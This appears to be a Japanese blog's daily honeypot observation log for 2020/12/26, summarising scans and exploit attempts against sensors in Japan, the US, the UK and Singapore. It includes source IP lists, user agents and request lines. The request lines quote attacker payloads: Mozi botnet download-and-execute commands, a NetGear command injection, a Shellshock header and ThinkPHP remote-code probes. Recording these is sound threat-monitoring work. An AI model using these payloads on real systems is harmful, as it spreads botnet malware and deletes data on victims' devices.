コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2020/12/26 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2020/12/26分です。

特徴
Location:JP

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
zgrabによるスキャン行為
ZmEuによるスキャン行為
Wgetによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
123[.]125[.]114[.]144に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Shellshock(CVE-2014-7169)脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
123[.]125[.]114[.]144に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
polaris botnetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//221[.]146[.]28[.]163:50393/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
123[.]125[.]114[.]144に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//36[.]26[.]129[.]122:44698/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:147 (前日比:+80)
US:総アクセス数:55 (前日比:-29)
UK:総アクセス数:40 (前日比:-23)
SG:総アクセス数:210 (前日比:-191)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.202.114.19 China
1 15.188.75.5 United States
1 27.156.80.89 China
1 27.254.253.172 Thailand
1 35.227.68.74 United States
2 40.74.231.153 United States
1 40.89.144.173 United States
20 45.155.205.108 Russia
1 47.100.77.209 China
1 47.100.119.51 China
1 49.118.202.247 China
10 49.232.23.20 China
1 61.219.11.153 Taiwan
1 64.31.8.10 United States
1 66.240.205.34 United States
2 94.102.49.26 Netherlands
1 106.45.1.238 China
1 112.80.138.69 China
1 118.81.236.121 China
10 119.161.169.85 China
1 121.34.151.202 China
1 121.57.228.84 China
1 125.42.114.13 China
10 139.9.68.163 China
1 146.59.155.210 France
6 158.69.138.27 Canada
1 159.203.57.179 United States
1 167.99.39.164 United States
2 167.99.208.105 United States
1 171.34.178.89 China
1 172.104.242.173 United States
1 175.152.30.214 China
1 182.114.0.88 China
1 192.241.221.104 United States
1 198.98.50.161 United States
1 198.144.190.164 United States
1 205.185.117.67 United States
24 209.141.41.134 United States
2 209.141.48.242 United States
24 209.141.50.5 United States
1 210.114.19.73 South Korea
1 211.214.107.108 South Korea
1 217.160.242.226 Germany
1 219.157.60.221 China
1 220.200.166.110 China
1 222.186.136.150 China

UserAgent一覧

件数 UserAgent
23 -
6 Go-http-client/1.1
1 Hello, World
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:83.0) Gecko/20100101 Firefox/83.0
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
20 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
18 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
7 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
1 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.01694878 Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTBDFff GTB7.0
3 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 Python-urllib/2.7
1 Wget/1.20.1 (linux-gnu)
50 ZmEu

リクエスト内容一覧

件数 Method Request Protocol
5 -
2 \x16\x03\x01\x01\xfa\x01
6 \x16\x03\x01\x02
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]ipip[.]net/:443 HTTP/1.1
2 CONNECT www[.]ripe[.]net/:443 HTTP/1.1
7 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1 HTTP/1.1
2 GET /MyAdmin/scripts/setup.php HTTP/1.1
2 GET /PMA/scripts/setup.php HTTP/1.1
2 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
2 GET /admin/pma/scripts/setup.php HTTP/1.1
2 GET /admin/scripts/setup.php HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /db-admin/scripts/setup.php HTTP/1.1
2 GET /elrekt.php HTTP/1.1
1 GET /evox/about HTTP/1.1
2 GET /favicon.ico HTTP/1.1
2 GET /html/public/index.php HTTP/1.1
2 GET /index.php HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
2 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /is_test HTTP/1.1
6 GET /manager/html/ HTTP/1.0
1 GET /manager/html/ HTTP/1.1
1 GET /manager/text/list HTTP/1.1
2 GET /myadmin/scripts/setup.php HTTP/1.1
2 GET /mysql/db/scripts/setup.php HTTP/1.1
1 GET /nmaplowercheck1608908586 HTTP/1.1
2 GET /php-my-admin/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmi/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmin-3/scripts/setup.php HTTP/1.1
3 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmin2/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmin3/scripts/setup.php HTTP/1.1
2 GET /phpMyAdminold/scripts/setup.php HTTP/1.1
2 GET /phpmanager/scripts/setup.php HTTP/1.1
2 GET /phpmy-admin/scripts/setup.php HTTP/1.1
2 GET /phpmy/scripts/setup.php HTTP/1.1
2 GET /phpmyadmin/scripts/setup.php HTTP/1.1
2 GET /phpmyadmin1/scripts/setup.php HTTP/1.1
2 GET /pma/scripts/setup.php HTTP/1.1
2 GET /public/index.php HTTP/1.1
2 GET /scripts/setup.php HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /sql/scripts/setup.php HTTP/1.1
2 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//boxun[.]com/ HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 GET http[:]//www[.]123cha[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD http[:]//123[.]125[.]114[.]144/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /index.php?s=captcha HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.202.113.111 China
1 1.202.113.239 China
1 1.202.114.209 China
2 36.27.208.157 China
1 36.32.3.10 China
1 37.44.238.35 France
10 45.155.205.108 Russia
1 60.13.6.56 China
2 61.219.11.153 Taiwan
1 64.31.8.10 United States
1 82.165.48.140 Germany
2 85.214.44.193 Germany
1 94.102.49.26 Netherlands
1 106.13.50.18 China
1 106.45.1.235 China
1 112.66.98.140 China
1 112.66.106.211 China
1 113.128.104.39 China
1 116.1.220.61 China
1 116.52.118.43 China
1 119.39.46.113 China
1 119.39.46.237 China
1 119.39.47.92 China
1 120.52.152.20 China
1 121.233.101.31 China
1 123.160.172.14 China
2 163.197.87.192 South Africa
1 167.71.167.244 United States
1 175.152.111.238 China
1 178.128.28.45 Netherlands
1 182.142.102.224 China
1 192.241.203.84 United States
1 192.241.223.64 United States
1 198.98.50.161 United States
1 198.144.190.164 United States
1 205.185.117.67 United States
1 206.189.159.201 United States
1 219.140.119.142 China
1 221.213.75.72 China
1 222.79.48.225 China
1 222.94.195.28 China
1 222.186.136.150 China

UserAgent一覧

件数 UserAgent
2 () { :;};echo; /bin/bash -c \" echo 2014 | md5sum\"
5 -
2 Go-http-client/1.1
1 Hello, World
1 Hello, world
1 Mozilla/4.01707650 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:83.0) Gecko/20100101 Firefox/83.0
9 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.01732016 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
2 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.01688858 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
1 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
8 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 Python-urllib/2.7

リクエスト内容一覧

件数 Method Request Protocol
2 -
3 \x16\x03\x01\x01\xfb\x01
2 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
2 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
2 CONNECT www[.]ipip[.]net/:443 HTTP/1.1
2 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
1 GET //cgi-bin/test.cgi HTTP/1.1
1 GET //cgi-sys/realsignup.cgi HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /is_test HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/html/ HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /pmd/index.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//boxun[.]com/ HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
2 GET http[:]//www[.]123cha[.]com/ HTTP/1.1
2 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
2 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
2 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
3 HEAD http[:]//123[.]125[.]114[.]144/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
20 45.155.205.108 Russia
1 64.31.8.10 United States
1 94.102.49.26 Netherlands
1 121.37.152.253 China
1 131.108.4.154 Panama
6 147.139.40.255 United States
1 159.65.155.177 United States
1 172.105.89.161 United States
1 175.200.49.121 South Korea
1 182.254.159.2 China
1 192.241.215.173 United States
1 192.241.216.41 United States
1 198.144.190.164 United States
1 205.185.117.67 United States
1 221.15.147.129 China
1 221.146.28.163 South Korea

UserAgent一覧

件数 UserAgent
8 -
1 Go-http-client/1.1
1 Hello, world
20 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
2 Mozilla/5.0 zgrab/0.x
1 Python-urllib/2.7
1 polaris botnet

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01\xfc\x01
2 \x16\x03\x01\x02
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /evox/about HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /is_test HTTP/1.1
1 GET /manager/html HTTP/1.1
3 GET /manager/html/ HTTP/1.0
1 GET /manager/text/list HTTP/1.1
1 GET /nmaplowercheck1608887144 HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//221[.]15[.]147[.]129:59208/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//221[.]146[.]28[.]163:50393/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /boaform/admin/formPing HTTP/1.1
1 POST /sdk HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 13.65.127.61 United States
1 27.115.124.74 China
1 27.115.124.75 China
1 27.115.124.99 China
1 27.224.136.186 China
1 27.224.137.26 China
1 36.26.129.122 China
1 40.74.231.153 United States
2 43.241.18.80 China
20 45.155.205.108 Russia
1 46.101.25.224 Netherlands
1 46.101.27.30 Netherlands
101 49.91.241.1 China
2 61.219.11.153 Taiwan
1 64.31.8.10 United States
1 75.127.1.218 United States
2 94.102.49.26 Netherlands
1 106.14.39.239 China
1 106.45.0.231 China
1 110.177.180.21 China
1 111.224.220.135 China
1 111.231.59.88 China
1 112.66.103.136 China
1 113.120.14.129 China
3 115.221.1.40 China
1 119.39.46.150 China
1 124.235.138.123 China
1 129.205.124.180 Nigeria
1 172.105.89.161 United States
1 178.62.82.4 United Kingdom
1 178.238.8.170 United Kingdom
1 192.241.196.70 United States
1 192.241.215.230 United States
1 194.61.55.248 Russia
1 198.98.50.161 United States
1 205.185.117.67 United States
24 209.141.46.254 United States
24 209.141.48.242 United States
1 219.143.174.194 China
1 222.186.136.150 China

UserAgent一覧

件数 UserAgent
12 -
2 Go-http-client/1.1
1 Hello, world
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
20 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3239.132 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
2 Mozilla/5.0 zgrab/0.x
3 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 Python-urllib/2.7
48 ZmEu
1 curl/7.47.0

リクエスト内容一覧

件数 Method Request Protocol
4 -
1 \x03
1 \x16\x03\x01
3 \x16\x03\x01\x01\xfb\x01
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 CONNECT www[.]ipip[.]net/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
4 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /MyAdmin/scripts/setup.php HTTP/1.1
2 GET /PMA/scripts/setup.php HTTP/1.1
2 GET /admin/pma/scripts/setup.php HTTP/1.1
2 GET /admin/scripts/setup.php HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /db-admin/scripts/setup.php HTTP/1.1
2 GET /index.php HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /is_test HTTP/1.1
1 GET /manager/html HTTP/1.1
2 GET /manager/html/ HTTP/1.0
1 GET /manager/text/list HTTP/1.1
2 GET /myadmin/scripts/setup.php HTTP/1.1
2 GET /mysql/db/scripts/setup.php HTTP/1.1
2 GET /php-my-admin/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmi/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmin-3/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmin2/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmin3/scripts/setup.php HTTP/1.1
2 GET /phpMyAdminold/scripts/setup.php HTTP/1.1
2 GET /phpmanager/scripts/setup.php HTTP/1.1
2 GET /phpmy-admin/scripts/setup.php HTTP/1.1
2 GET /phpmy/scripts/setup.php HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
2 GET /phpmyadmin/index.php HTTP/1.1
2 GET /phpmyadmin/scripts/setup.php HTTP/1.1
2 GET /phpmyadmin1/scripts/setup.php HTTP/1.1
2 GET /pma/scripts/setup.php HTTP/1.1
1 GET /pmd/index.php HTTP/1.1
2 GET /scripts/setup.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//36[.]26[.]129[.]122:44698/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /sql/scripts/setup.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//boxun[.]com/ HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 GET http[:]//www[.]123cha[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD http[:]//123[.]125[.]114[.]144/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1